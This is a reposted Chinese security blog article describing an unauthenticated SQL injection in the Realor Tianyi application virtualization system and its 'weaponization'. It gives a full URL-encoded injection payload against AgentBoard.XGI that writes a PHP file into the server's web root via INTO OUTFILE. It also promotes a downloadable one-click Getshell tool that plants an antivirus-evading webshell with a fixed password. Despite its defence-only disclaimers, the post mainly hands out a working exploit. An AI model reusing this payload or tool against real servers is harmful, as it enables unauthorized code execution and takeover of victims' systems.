瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化

admin 2023年6月5日23:01:51评论344 views1字数 1145阅读3分49秒阅读模式
瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化

工具开发

瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化

声明

  1. 文章仅用于基础信息防御交流,请勿用于其他用途!请勿利用文章中的相关技术进行非法测试!

  2. 原创不易,未经授权请勿转载,文章转载请标明出处。

瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化

漏洞简介

       瑞友天翼应用虚拟化系统由于对用户传入的数据安全处理不当,导致存在 SQL 注入漏洞,远程且未经过授权认证的攻击者可利用此漏洞获取数据库里敏感信息,也可进一步写入 webshell 后门访问,攻击者从而可在目标服务器上执行任意恶意代码,获取系统权限。

影响范围

5.x<=version<=7.0.2.1

简单分析

根据Xray新增的漏洞探测Poc和网上打码发出的图片进行漏洞位置猜测。搭建环境进行简单的源码查看。在AgentBoard.php文件中可以看到漏洞位置,直接接收一个user参数。

瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化

访问/AgentBoard.XGI查看页面。

瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化

当cmd参数为UserLogin时,可绕过验证。

瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化

单引号闭合SQL语句,构造传参。

Select user_id,f_id from CUser where name=''1&cmd=UserLogin

into outfile写入文件。提前是安装为默认路径:

C:\Program Files (x86)\RealFriend\Rap Server\WebRoot\

写入phpinfo Poc:

/AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5CAppListwe.XGI%5C%5phpinfo.php%22+--+-&cmd=UserLogin

检测工具

正所谓No Exp Say jb!使用javaFx实现图形化脚本。

1、通过ConsoleExternalUploadApi接口和AgentBoard.XGI接口进行检测2、测试POC参考Xray探测包3、上传WbeShell使用了一定的免杀技术,只支持蚁剑,连接密码为realor

漏洞检测:

瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化

一键Getshell:

瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化

蚁剑测试:

瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化

工具获取:

声明:本工具仅用于系统安全评估,请勿用于其他非法测试!

https://cowtransfer.com/s/93c2c94978c146口令:w9jeq7

加群交流

考虑到上传的工具可能被和谐,或者存在Bug方便大家提需求,交流学习可以加一下群,后续编写的图形化Exp工具也会同步分享到群里。二维码过期请联系公众号加群。

瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化



END


原文始发于微信公众号(信安驿站):瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月5日23:01:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化http://cn-sec.com/archives/1764009.html

发表评论

匿名网友 填写信息